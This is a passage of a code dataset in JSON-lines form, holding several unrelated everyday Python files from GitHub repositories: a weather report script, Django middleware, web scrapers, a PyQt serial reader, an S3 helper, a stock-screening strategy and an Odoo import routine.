f\"Wind direction: {info['wind_cdir_full']}\"\r\n\r\nws = info['wind_spd']\r\nif ws <= 1.5:\r\n text = \"calm \"\r\nelif ws <= 5:\r\n text = \"light breeze \"\r\nelif ws <= 9:\r\n text = \"moderate breeze \"\r\nelif ws <= 12:\r\n text = \"wind \"\r\nelif ws <= 16:\r\n text = \"moderate wind \"\r\nelif ws <= 18:\r\n text = \"STRONG WIND \"\r\nelif ws <= 20:\r\n text = \"STORM WIND! \"\r\nelse:\r\n text = \"DON'T LEAVE THE ROOM!!! \"\r\nws = text + format(ws, '.1f')\r\nwind_speed = f\"Wind speed: {ws}\"\r\n\r\nuvi = info['uv']\r\nif uvi <= 2:\r\n uvi = \"green\"\r\nelif uvi <= 5:\r\n uvi = \"yellow...\"\r\nelif uvi <= 7:\r\n uvi = \"orange!\"\r\nelif uvi <= 10:\r\n uvi = \"RED!!!\"\r\nelse:\r\n uvi = \"DON'T LEAVE THE ROOM!!!\"\r\nuv_index = f\"UV Index: {uvi}\"\r\n\r\nepa = info['aqi']\r\nif epa <= 50:\r\n epa = \"good green air.\"\r\nelif epa <= 100:\r\n epa = \"yellow moderate pollute.\"\r\nelif epa <= 150:\r\n epa = \"orange unhealthy pollution!\"\r\nelif epa <= 200:\r\n epa = \"RED HIGH POLLUTION!\"\r\nelif epa <= 300:\r\n epa = \"PURPLE VERY UNHEALTHY EMISSIONS!\"\r\nelse:\r\n epa = \"MAROON HAZARDOUS!!!\"\r\nair_quality = f\"Air Quality: {epa}\"\r\n\r\noutput = [location, date, temperature, apparent, wind_direction,\r\n wind_speed, uv_index, air_quality]\r\n\r\n# output.\r\nprint(*output, sep='\\n')\r\nsys.exit(0)\r\n","repo_name":"voronokKita/garage","sub_path":"Python/Automate the Boring Stuff with Python, Al Sweigart/14 json, api/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72349590275","text":"from .models import *\nclass RequestCountMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n # Retrieve the request count from the database\n request_counter, created = RequestCounter.objects.get_or_create(pk=1)\n request_count = request_counter.count\n\n # Increment the request count\n request_count += 1\n request_counter.count = request_count\n request_counter.save()\n\n response = self.get_response(request)\n return response","repo_name":"srvpl07/Movie-Collection","sub_path":"apps/collection/request_count_middleware.py","file_name":"request_count_middleware.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21501556325","text":"import requests\nimport lxml\nfrom bs4 import BeautifulSoup as bsp\n\nweb_page_html = requests.get('https://www.worldstandards.eu/other/tlds/').text\nweb_page = bsp(web_page_html,'html.parser')\n\n\n# print(web_page.find_all(class_ = 'table table-striped'))\ntable = web_page.find_all(class_ = 'table table-striped')[0]\nprint(type(table))\nprint(len(web_page.find_all(class_ = 'table table-striped')))\nlist_data = table.findAll('td')\nwith open('./data/country_domain.csv',mode='w+') as file:\n for index, item in enumerate(list_data):\n if index % 2 == 0:\n file.write(item.text + ', ')\n else:\n file.write(item.text + '\\n')\n\n\n# for table in web_page.find_all(class_ = 'table table-striped'):\n# table.tbody.","repo_name":"trantrikien239/exercise","sub_path":"decode_a_webpage_17.py","file_name":"decode_a_webpage_17.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19043525723","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom cipher import MyApp\nimport cipher as c\nimport time\nimport serial\nfrom PyQt5.QtWidgets import QLabel, QLineEdit, QPushButton, QVBoxLayout\n\nser = serial.Serial(\n port = \"/dev/ttyUSB1\",\n baudrate = 115200,\n bytesize = serial.EIGHTBITS, \n parity = serial.PARITY_NONE,\n stopbits = serial.STOPBITS_ONE, \n timeout = 0.5,\n xonxoff = True,\n rtscts = False,\n dsrdtr = False,\n writeTimeout = 0.5\n )\n\nclass MyApp(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n vbox = QVBoxLayout()\n edit = QLineEdit('abc')\n vbox.addWidget(edit)\n self.setLayout(vbox)\n\n self.setWindowTitle('My First Application')\n self.move(300, 300)\n self.resize(400, 200)\n self.show()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyApp()\n edit = QLineEdit()\n\n check_flag = ser.isOpen()\n print(\"Polling Comm port Check :\", check_flag, \"\\n\")\n\n while check_flag :\n if ser.readable(): \n res = ser.readline() \n edit.setText(res.decode()[:len(res) - 2])\n\n ser.close()\n\n sys.exit(app.exec_())","repo_name":"riverSun1/Cipher-Pro","sub_path":"20220209/cipher_pc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32725314883","text":"import numpy as np\r\nimport tensorflow as tf\r\n\r\ndef MinMaxScaler(x):\r\n col_min = np.min(x, axis = 0)\r\n col_max = np.max(x, axis = 0)\r\n denominator = (col_max - col_min) + 1e-7\r\n numerator = x - col_min\r\n return numerator/denominator\r\n\r\nSEED = 0\r\nSAVE_DIR = './data/pendigits.tfrecords'\r\n\r\npendigits_train = np.loadtxt('./data/pendigits_train.csv', delimiter = ',')\r\npendigits_test = np.loadtxt('./data/pendigits_test.csv', delimiter = ',')\r\n\r\npendigits_data = np.append(pendigits_train, pendigits_test, axis = 0)\r\nnsamples = np.size(pendigits_data, 0)\r\n\r\nnp.random.seed(SEED)\r\nmask = np.random.permutation(nsamples)\r\npendigits_data = pendigits_data[mask]\r\nx_data = MinMaxScaler(pendigits_data[:,:-1])\r\ny_data = pendigits_data[:,-1].astype(int)\r\n\r\nndim = np.size(x_data, 1)\r\n\r\nwriter = tf.python_io.TFRecordWriter(SAVE_DIR)\r\nexample = tf.train.Example(features = tf.train.Features(feature = {\r\n 'features':tf.train.Feature(float_list = tf.train.FloatList(value = x_data.flatten())),\r\n 'label':tf.train.Feature(int64_list = tf.train.Int64List(value = y_data))\r\n }))\r\nwriter.write(example.SerializeToString())\r\nwriter.close()","repo_name":"ghlee0304/tensorflow-basic-and-advanced","sub_path":"Basic/lab04_5_data_manipulation_tfrecord_write.py","file_name":"lab04_5_data_manipulation_tfrecord_write.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73483671555","text":"from nicegui import ui\nimport components\nimport global_state\nimport persistence\n\n\ndef requirement_list(product_yarn_records: list):\n total = total_price(product_yarn_records=product_yarn_records)\n sum_unit = total_unit(product_yarn_records=product_yarn_records)\n with ui.grid(columns=7):\n for product_yarn_record in product_yarn_records:\n ui.label(text=product_yarn_record[\"yarn_name\"])\n ui.button(color=product_yarn_record[\"yarn_color\"])\n ui.label(text=product_yarn_record[\"yarn_price_per_unit\"])\n ui.label(text=\"VND\")\n ui.label(text=\"x\")\n ui.label(text=product_yarn_record[\"yarn_count\"])\n if product_yarn_record[\"yarn_count\"] == 1:\n ui.label(\"ball\")\n else:\n ui.label(\"balls\")\n\n ui.label(text=\"Total\").classes(add=\"text-lg\")\n ui.element()\n ui.label(text=str(total)).classes(add=\"text-lg\")\n ui.label(text=\"VND\").classes(add=\"text-lg\")\n ui.label(text=\" \")\n ui.label(text=str(sum_unit)).classes(add=\"text-lg\")\n if sum_unit == 1:\n ui.label(\"ball\").classes(add=\"text-lg\")\n else:\n ui.label(\"balls\").classes(add=\"text-lg\")\n\n\ndef total_price(product_yarn_records: list):\n result = 0\n for requirement in product_yarn_records:\n result += requirement[\"yarn_price_per_unit\"] * requirement[\"yarn_count\"]\n return result\n\n\ndef total_unit(product_yarn_records: list):\n result = 0\n for requirement in product_yarn_records:\n result += requirement[\"yarn_count\"]\n return result\n\n\n@ui.page(\"/product/{id_}\")\ndef page(id_: str):\n product = global_state.get_product(id_=id_)\n ui.label(text=product[\"name\"]).classes(add=\"text-2xl\")\n with ui.row():\n ui.image(source=product[\"image_url\"]).style(add=\"width: 400px\")\n with ui.column():\n ui.label(text=\"Materials\").classes(add=\"text-lg\")\n product_yarn_records = persistence.get_product_yarns(product_id=id_)\n requirement_list(product_yarn_records=product_yarn_records)\n ui.label(text=\"Description\").classes(add=\"text-lg\")\n ui.markdown(content=product[\"description\"])\n ui.label(text=\"Patterns\").classes(add=\"text-lg\")\n ui.markdown(content=product[\"patterns\"])\n\n def handle_delete_product():\n global_state.delete_product(id_=id_)\n global_state.refresh_products()\n\n # Ensure that the current page does not become invalid after we remove\n # one product.\n #\n # For example:\n # - Our page size is 6, and\n # - There is precisely 13 products, then\n # - We are going to have 3 pages.\n # - Removing one product means the maximal page number becomes 2.\n #\n # If the current page number is 3, then we are going to have invalid\n # state on clicking \"Back\".\n #\n max_page = global_state.calculate_max_page()\n if global_state.get_page() >= max_page:\n global_state.set_page(max_page)\n\n components.product_pagination.refresh()\n components.product_gallery.refresh()\n ui.open(target=\"/\")\n\n with ui.dialog() as dialog, ui.card():\n ui.label(text=\"Are you sure you want to delete this?\")\n with ui.row():\n ui.button(text=\"Yes\").on(\n \"click\",\n lambda _: handle_delete_product()\n )\n ui.button(text=\"No\").on(\n \"click\",\n lambda _: dialog.close()\n )\n\n with ui.row().bind_visibility_from(\n target_object=global_state.dict_,\n target_name=\"logged_in_user\",\n backward=lambda value: value is not None,\n ):\n ui.button(text=\"Edit Product\").on(\n \"click\",\n lambda _: ui.open(target=f\"/edit-product/{id_}\"),\n )\n ui.button(text=\"Delete Product\", color=\"deep-orange\").on(\n \"click\",\n lambda _: dialog.open(),\n )\n\n ui.link(text=\"Back\", target=\"/\")\n\n","repo_name":"thanhnguyen2187/knitten","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16924093485","text":"from datetime import datetime\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nfrom ....Data.Engine.DyStockDataEngine import *\nfrom ..DyStockSelectStrategyTemplate import *\nfrom ....Data.Utility.DyStockDataSpider import *\n\n\nclass DySS_High2SendStocks(DyStockSelectStrategyTemplate):\n \"\"\"\n 高送转主要因子:\n 每股公积金: >= 5\n 每股未分配利润: >= 1\n 总股本(亿): <= 2\n 股本因子: 1\n 机构持仓比例低\n 高成长性: 营业收入和净利润增长,首先看营业收入(可以列为可选,但还是比较重要的)\n 最近解禁日期: 配合出货(可选因子)\n 每股净资产:>=5(可选因子)\n\n 高转送炒作时间:\n 5月左右炒中报\n 10~11月左右炒年报,有些高增长的可能9月底炒作。9月可以结合大盘开始布局\n \"\"\"\n name = 'DySS_High2SendStocks'\n chName = '高送转'\n\n colNames = ['代码', '名称', '排名', '得分', '现价', '每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n '流通A股(亿)', '总股本(亿)', '流通市值(亿元)', '总市值(亿元)',\n '最近解禁日期', '解禁股占总股本比例(%)',\n '股本因子', '最近送转日期', '机构持股占流通股比例(%)',\n '净利润YoY(%)', '营业收入YoY(%)', '每股收益(元)', '每股现金流(元)',\n '上市日期'\n ]\n\n param = OrderedDict\\\n ([\n ('基准日期', datetime.today().strftime(\"%Y-%m-%d\")),\n ('选几只股票', 0)\n ])\n\n paramToolTip = {'选几只股票': '0:所有股票'}\n\n fullyPushDays = True # 全推所有股票的日线数据\n\n # 策略参数\n dividendPlanGrepDetail = re.compile('(\\d+)股?(?:送({0})股?)?(?:转增?({0})股?)?'.format('\\d+(?:\\.\\d+)?'))\n\n def __init__(self, param, info):\n super().__init__(param, info)\n\n # unpack parameters\n self._baseDate = param['基准日期']\n self._selectStockNbr = param['选几只股票']\n\n self.__data = {}\n\n def onDaysLoad(self):\n return self._baseDate, 0\n\n def onInit(self, dataEngine, errorDataEngine):\n self._stockAllCodes = dataEngine.daysEngine.stockAllCodes\n\n errorInfo = DyErrorInfo(dataEngine.eventEngine)\n errorDataEngine = DyStockDataEngine(dataEngine.eventEngine, errorInfo, registerEvent=False)\n self._errorDaysEngine = errorDataEngine.daysEngine\n \n def _getShareFactor(self, dividendPlan):\n \"\"\"\n 根据同花顺的'分红方案说明'计算股本因子\n\n 匹配的文本格式:\n dividendPlan = '10送5股转25股派1.25元(含税)'\n dividendPlan = '10送5股派1.25元(含税)'\n dividendPlan = '10转25股派1.25元(含税)'\n dividendPlan = '10股转10.090840股派0.504542元(含税)'\n dividendPlan = '10转增2股派2.5元(含税)'\n \"\"\"\n match = self.dividendPlanGrepDetail.match(dividendPlan)\n if match:\n groups = match.groups()\n\n base = int(groups[0])\n sum = 0\n for group in groups[1:]:\n try:\n group = float(group)\n sum += group\n except Exception as ex:\n pass\n\n shareFactor = (sum + base)/base\n else:\n shareFactor = 1\n\n return shareFactor\n\n def _getIndicators(self, code):\n \"\"\"\n @return: ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)', '流通A股(亿)', '总股本(亿)',\n '最近解禁日期', '解禁股占总股本比例(%), '股本因子', '最近送转日期',\n '净利润YoY(%)', '营业收入YoY(%)', '每股收益(元)', '每股现金流(元)'\n ]\n \"\"\"\n mainLink = 'http://basic.10jqka.com.cn/16/{0}/'.format(code[:-3])\n r = requests.get(mainLink)\n soup = BeautifulSoup(r.text, 'lxml')\n\n tag = soup.find('h2', text='财务指标')\n tag = tag.parent.parent\n tag = tag.find('tbody')\n tag = tag.find('tr')\n tags = tag.find_all('td')\n nextTrTag = tag.next_sibling.next_sibling # 由于业绩快报原因,可能每股公积金和每股未分配利润还没出来,则用前期的。\n nextTdTags = nextTrTag.find_all('td')\n\n for i, tag in enumerate(tags):\n if i == 2: # 每股净资产(Net asset value per share)\n navps = DyCommon.toFloat(tag.string)\n\n elif i == 3: # 每股公积金(Provident fund per share)\n pfps = DyCommon.toFloat(tag.string, None)\n if pfps is None:\n pfps = DyCommon.toFloat(nextTdTags[3].string)\n\n elif i == 4: # 每股未分配利润(Undistributed profit per share)\n udpps = DyCommon.toFloat(tag.string, None)\n if udpps is None:\n udpps = DyCommon.toFloat(nextTdTags[4].string)\n\n tag = soup.find('span', text='流通A股:')\n tag = tag.next_sibling\n floatingShares = float(tag.text[:-2]) # 流通A股(亿)\n\n tag = soup.find('span', text='总股本:')\n tag = tag.next_sibling.next_sibling\n totalShares = float(tag.text[:-2]) # 总股本(亿)\n\n # get 股本结构 page\n tag = soup.find('a', text='股本结构')\n link = mainLink + tag.attrs['href'][2:]\n r = requests.get(link)\n soup = BeautifulSoup(r.text, 'lxml')\n\n latestReleaseDate = None\n latestBanSharesPct = None\n tag = soup.find('h2', text='解禁时间表')\n if tag is not None:\n tag = tag.parent.parent.find('tbody')\n tags = tag.find_all('tr')\n\n todayDate = datetime.now().strftime(\"%Y-%m-%d\")\n for tag in tags:\n # 解禁日期\n tag_ = tag.find('th')\n releaseDate = str(tag_.string)\n\n if releaseDate > todayDate:\n if latestReleaseDate is None:\n latestReleaseDate = releaseDate\n else:\n if releaseDate < latestReleaseDate:\n latestReleaseDate = releaseDate\n\n if latestReleaseDate == releaseDate:\n # 解禁股占总股本比例(%)\n tags_ = tag.find_all('td')\n latestBanSharesPct = float(tags_[-3].string[:-1])\n \n # get 分红融资 page\n tag = soup.find('a', text='分红融资')\n link = mainLink + tag.attrs['href'][2:]\n r = requests.get(link)\n soup = BeautifulSoup(r.text, 'lxml')\n\n # 历史送转记录\n shareFactor = 1 # 股本因子\n latestSendSharesDate = None\n\n tag = soup.find('th', text='分红方案说明')\n if tag is not None: # 新股有可能还没有过分红\n tag = tag.parent.parent.parent.find('tbody')\n tags = tag.find_all('tr')\n \n for tag in tags:\n tags_ = tag.find_all('td')\n dividendPlan = tags_[4].string # 每次的'分红方案说明'\n newShareFactor = self._getShareFactor(dividendPlan)\n shareFactor *= newShareFactor\n\n # 获取最近的送转日期\n if newShareFactor > 1 and latestSendSharesDate is None:\n latestSendSharesDate = str(tags_[3].string) # 送转实施日期\n\n # 最近机构持股占流通股比例(%)\n fundPositionsRatio, fundNbr = DyStockDataSpider.getLatestFundPositionsRatio(code)\n\n # 财务报表里的指标\n otherIndicators = DyStockDataSpider.getLatestFinanceReport(code, ['净利润YoY(%)', '营业收入YoY(%)', '每股��益(元)', '每股现金流(元)'])\n\n return [navps, pfps, udpps, floatingShares, totalShares, latestReleaseDate, latestBanSharesPct, shareFactor, latestSendSharesDate, fundPositionsRatio] + otherIndicators\n\n def onStockDays(self, code, df):\n try:\n values = self._getIndicators(code)\n except Exception as ex:\n self._info.print('从同花顺爬取[{0}: {1}]数据错误[{2}]'.format(code, self._stockAllCodes[code], self._baseDate), DyLogData.warning)\n return\n\n # get ['现价'] and ['流通市值(亿元)', '总市值(亿元)']\n if df is None or df.empty:\n if not self._errorDaysEngine.loadCode(code, [self._baseDate, 0]):\n self._info.print('载入[{0}: {1}]日线数据错误[{2}]'.format(code, self._stockAllCodes[code], self._baseDate), DyLogData.warning)\n return\n\n df = self._errorDaysEngine.getDataFrame(code)\n\n pos = self.colNames.index('流通市值(亿元)') - self.colNames.index('每股净资产(元)')\n close = df.ix[-1, 'close']\n marketValues = [values[pos - 2]*close, values[pos - 1]*close]\n\n # get 股票上市日期\n marketDate = self._errorDaysEngine.getStockMarketDate(code, name=self._stockAllCodes[code])\n if marketDate is None:\n self._info.print('获取[{0}: {1}]上市日期错误'.format(code, self._stockAllCodes[code]), DyLogData.warning)\n return\n\n # combine, note that value positons should be aligned with @colNames\n self.__data[code] = [self._stockAllCodes[code]] + [close] + values[:pos] + marketValues + values[pos:] + [marketDate]\n\n def onDone(self):\n df = pd.DataFrame(self.__data).T\n start = self.colNames.index('每股净资产(元)')\n df.rename(columns={i: x for i, x in enumerate(['名称', '现价'] + self.colNames[start:])}, inplace=True)\n\n # add scores, default\n colNames = ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n '总股本(亿)', '流通A股(亿)',\n '现价',\n '最近解禁日期', '解禁股占总股本比例(%)',\n '股本因子',\n '最近送转日期',\n '机构持股占流通股比例(%)',\n '营业收入YoY(%)'\n ]\n\n df = self.__class__._addScores(df, colNames)\n\n # set result\n if self._selectStockNbr > 0:\n df = df.ix[:self._selectStockNbr]\n\n df.reset_index(inplace=True)\n\n self._result = df.values.tolist()\n\n def _addScores(df, colNames):\n \"\"\"\n @df: index is code, and no ['排名', '得分'] columns\n @colNames: [colName], in which column is taken for calculating scores\n \"\"\"\n columns = list(df.columns)\n newColumns = columns[:1] + ['排名', '得分'] + columns[1:]\n\n seriesList = []\n\n # rank for each indicator, think rank as score that the high score is the better is\n if '每股净资产(元)' in colNames:\n series = df['每股净资产(元)'].rank()\n seriesList.append(series)\n\n if '每股公积金(元)' in colNames:\n series = df['每股公积金(元)'].rank()\n seriesList.append(series)\n\n if '每股未分配利润(元)' in colNames:\n series = df['每股未分配利润(元)'].rank()\n seriesList.append(series)\n\n if '总股本(亿)' in colNames:\n series = df['总股本(亿)'].rank(ascending=False)\n seriesList.append(series)\n\n if '流通A股(亿)' in colNames:\n series = df['流通A股(亿)'].rank(ascending=False)\n seriesList.append(series)\n\n if '现价' in colNames:\n series = df['现价'].rank(ascending=False)\n seriesList.append(series)\n\n if '最近解禁日期' in colNames:\n series = df['最近解禁日期'].fillna('3000-01-01').rank(ascending=False)\n seriesList.append(series)\n\n if '解禁股占总股本比例(%)' in colNames:\n series = df['解禁股占总股本比例(%)'].fillna(0).rank()\n seriesList.append(series)\n\n if '股本因子' in colNames:\n series = df['股本因子'].rank(ascending=False)\n seriesList.append(series)\n\n if '最近送转日期' in colNames:\n # '最近送转日期', 若没有送转,则用上市日期替代\n series1 = df['最近送转日期']\n series2 = df['上市日期'][series1.isnull()]\n series1 = series1[series1.notnull()]\n series = pd.concat([series1, series2])\n\n series = series.rank(ascending=False)\n seriesList.append(series)\n\n if '机构持股占流通股比例(%)' in colNames:\n series = df['机构持股占流通股比例(%)'].rank(ascending=False)\n seriesList.append(series)\n\n if '营业收入YoY(%)' in colNames:\n series = df['营业收入YoY(%)'].rank()\n seriesList.append(series)\n\n if '净利润YoY(%)' in colNames:\n series = df['净利润YoY(%)'].rank()\n seriesList.append(series)\n\n if '每股收益(元)' in colNames:\n series = df['每股收益(元)'].rank()\n seriesList.append(series)\n\n if '每股现金流(元)' in colNames:\n series = df['每股现金流(元)'].rank()\n seriesList.append(series)\n\n # concat to rank DF\n rankDf = pd.concat(seriesList, axis=1)\n\n # total rank\n scoreSeries = rankDf.sum(axis=1)*100/(len(seriesList) * rankDf.shape[0])\n scoreSeries.sort_values(ascending=False, inplace=True)\n scoreSeries.name = '得分'\n\n rankSeries = scoreSeries.rank(ascending=False)\n rankSeries.name = '排名'\n\n df = pd.concat([df, scoreSeries, rankSeries], axis=1)\n df = df.reindex(columns=newColumns)\n\n df = df.ix[scoreSeries.index]\n\n return df\n\n def refactory(df, params):\n \"\"\"\n @return: new rows list\n \"\"\"\n # clean\n df.set_index('代码', inplace=True)\n del df['排名']\n del df['得分']\n\n # parse @params\n colNames = []\n for key, value in params.items():\n if value == 1:\n colNames.append(key)\n\n # add scores\n df = DySS_High2SendStocks._addScores(df, colNames)\n\n df.reset_index(inplace=True)\n return df.values.tolist()\n\n def getRefactoryParams():\n pos = DySS_High2SendStocks.colNames.index('得分') + 1\n\n colNames = ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n '总股本(亿)',\n '股本因子']\n\n return ['列名', '值(0:不使用,1:使用)'], [[x, 1] if x in colNames else [x, 0] for x in DySS_High2SendStocks.colNames[pos:]]","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Select/Strategy/Fundamental/DySS_High2SendStocks.py","file_name":"DySS_High2SendStocks.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"30708172660","text":"import logging\nimport boto3\nfrom botocore.exceptions import ClientError\n\ndef create_bucket(bucket_name, region=None):\n\t# Create bucket\n\ttry:\n\t\tif region is None:\n\t\t\ts3_client = boto3.client('s3')\n\t\t\ts3_client.create_bucket(Bucket=bucket_name)\n\t\telse:\n\t\t\ts3_client = boto3.client('s3', region_name=region)\n\t\t\tlocation = {'LocationConstraint': region}\n\t\t\ts3_client.create_bucket(Bucket=bucket_name,\n\t\t\t\t\t\t\t\t\tCreateBucketConfiguration=location)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn False\n\treturn true\n\ndef put_object(bucket_name, key, value):\n\ttry:\n\t\ts3_client = boto3.client('s3')\n\t\ts3_client.put_object(Bucket=bucket_name, Key=key, Body=value)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn False\n\treturn True\n\t\ndef get_object(bucket_name, key):\n\ttry:\n\t\ts3_client = boto3.client('s3')\n\t\tresult = s3_client.get_object(Bucket=bucket_name, Key=key)\n\texcept ClientError as e:\n\t\tlogging.error(e)\n\t\treturn None\n\treturn result\n\t\n# edit main\ndef main():\n\t#create_bucket('edu.au.cc.image-gallery','us-east-2')\n\tput_object('edu.au.cc.python-image-gallery', 'HELLO', 'WORLD')\n\tprint (get_object('edu.au.cc.python-image-gallery', 'HELLO'))\n\tprint (get_object('edu.au.cc.python-image-gallery', 'HELLO')['Body'].read())\nif __name__ == '__main__':\n\tmain()\n","repo_name":"Dalbert1/m2-ig","sub_path":"gallery/tools/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74609024193","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api\nfrom lxml.builder import E\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n# Model exception\nmodel_exception = []\n\n\nclass BaseModel(models.AbstractModel):\n _inherit = 'base'\n\n @api.model_create_multi\n @api.returns('self', lambda value: value.id)\n def adms_import(self, list_vals):\n model = self.env['ir.model'].sudo().search([('model', '=', self._name)], limit=1)\n\n for vals in list_vals:\n # 0. Business Type need to be defined here, no matter what, the header and child\n # should always be on the same business type\n business_type = False\n business_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n company_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n if business_type_field:\n business_type_adms_key = 'x_studio_adms_id_' + business_type_field.name\n for key in vals:\n if key == business_type_adms_key:\n business_type = self.env['fal.business.type'].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n # 1. Translate any adms_id field into standard field\n new_vals = self.iterate_and_compute(model, vals, business_type)\n # 2. Determine wether it's create new or write\n # But to determine if it's have similar ID, it's not only based by x_studio_adms_id\n # as because on ADMS their database are separate for each company.\n # So, unique are, combination of Business type + ADMS ID\n # Extra Issue are, some object did not have Business type\n # ----------------------------\n # If business type field is present, search by adms_id + business type\n # TO DO: later there is some exception object\n domain = [('x_studio_adms_id', '=', vals['x_studio_adms_id'])]\n # Special case for Partner. Because ADMS split it's partner to customer and vendor\n # Both table have different approach\n if model.model in ['res.partner']:\n # If customer, do not find the business type. Only the company\n # And do not find in partner that is vendor\n # Means that customer and vendor can have the same ADMS ID\n if 'customer_rank' in new_vals and new_vals['customer_rank'] > 0:\n domain += [(company_type_field.name, '=', new_vals[company_type_field.name])]\n domain += [('customer_rank', '>', 0)]\n else:\n domain += [(company_type_field.name, '=', new_vals[company_type_field.name])]\n domain += [(business_type_field.name, '=', new_vals[business_type_field.name])]\n domain += [('supplier_rank', '>', 0)]\n # Special case for x_studio_reason_code, do not find company/business type\n # Means do nothing\n elif model.model in ['x_reason_adms']:\n pass\n elif business_type_field and model.model not in model_exception:\n domain += [(business_type_field.name, '=', new_vals[business_type_field.name])]\n similar_adms_id = self.sudo().search(domain)\n if similar_adms_id:\n # Before writing, make sure that this object method hasn't been called\n able_overwrite = self.check_method(model, similar_adms_id)\n if able_overwrite:\n result = similar_adms_id.sudo().write(new_vals)\n return similar_adms_id\n else:\n result = self.sudo().create(new_vals)\n return result\n return \"Something Went Wrong\"\n\n def iterate_and_compute(self, model, vals, business_type):\n new_vals = {}\n # We want business type to be searched upfront, so whatever the sequence of input\n # There will be no error\n business_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n if business_type_field:\n business_type_adms_key = 'x_studio_adms_id_' + business_type_field.name\n # Also find the Company field as we want to fill it automatically when we found the business type\n company_type_field = model.field_id.sudo().filtered(lambda x: x.relation == 'res.company' and x.ttype == 'many2one')\n\n # For every field in vals\n for key in vals:\n # If it's list. It can means 2 possibilities\n # Either create new record, or link (usually many2many)\n if isinstance(vals[key], list):\n # Need to change the model to the list field model\n field = self.env['ir.model.fields'].sudo().search([('model_id', '=', model.id), ('name', '=', key)])\n new_model = self.env['ir.model'].sudo().search([('model', '=', field.relation)], limit=1)\n component_business_type_field = new_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 'x_studio_frombranch', 'x_studio_tobranch'])\n # One2many component of API call set did not \"have\" ADMS ID\n # At first we do not know this, so for work around, we just don't need to\n # find out if component already have ADMS id, just always unlink all and\n # create a new one\n new_vals[key] = []\n new_vals[key] += [(5, 0, 0)]\n for o2m in vals[key]:\n # If it's 0, Means we need to define if it's creating new object or just\n # editing it by checking the adms id\n # If it's 6, Means we only relate the id, and so just need to find out the\n # real id\n if o2m[0] == 0:\n res = self.iterate_and_compute(new_model, o2m[2], business_type)\n new_vals[key] += [(0, 0, res)]\n elif o2m[0] == 6:\n new_o2mid = []\n # Here we want to map between the ADMS id given by API to Odoo ID\n for o2mid in o2m[2]:\n # If Tax, need to know if it's for sale/purchase\n if new_model.model in ['account.tax']:\n if model.model in ['x_po_tax', 'purchase.order.line']:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id), ('type_tax_use', '=', 'purchase')], limit=1).id)\n else:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id), ('type_tax_use', '=', 'sale')], limit=1).id)\n else:\n new_o2mid.append(self.env[new_model.model].sudo().search([('x_studio_adms_id', '=', o2mid), (component_business_type_field.name, '=', business_type.id)], limit=1).id)\n new_vals[key] = [(6, 0, new_o2mid)]\n # If it's a share id field for many2one relation\n # Find the object based on field search\n elif \"x_studio_adms_id_\" in key:\n # We try to get the real field name\n # It's always the 18th word\n field_name = key[17:]\n field = self.env['ir.model.fields'].sudo().search([('model_id', '=', model.id), ('name', '=', field_name)])\n # We want to find real_id of x_studio_adms_id field because they throw\n # adms id\n # Here, we do not only find based by adms id but also, if the object have\n # business type, need to be searched on business type\n\n # But, iF the key is business type, we do not want to search on business type.\n # Obviously, it doesn't have business type\n if business_type_field and key == business_type_adms_key:\n real_id = self.env[field.relation].sudo().search([('x_studio_adms_id', '=', vals[key])], limit=1)\n # If it's Business type, means we automatically find the company\n new_vals[company_type_field.name] = real_id.company_id.id\n # Except that\n else:\n # If business type is present\n # also include on our search business type domain\n m2o_model = self.env['ir.model'].sudo().search([('model', '=', field.relation)])\n m2o_business_type = m2o_model.field_id.sudo().filtered(lambda x: x.relation == 'fal.business.type' and x.ttype == 'many2one' and x.name not in ['x_studio_unitowner', 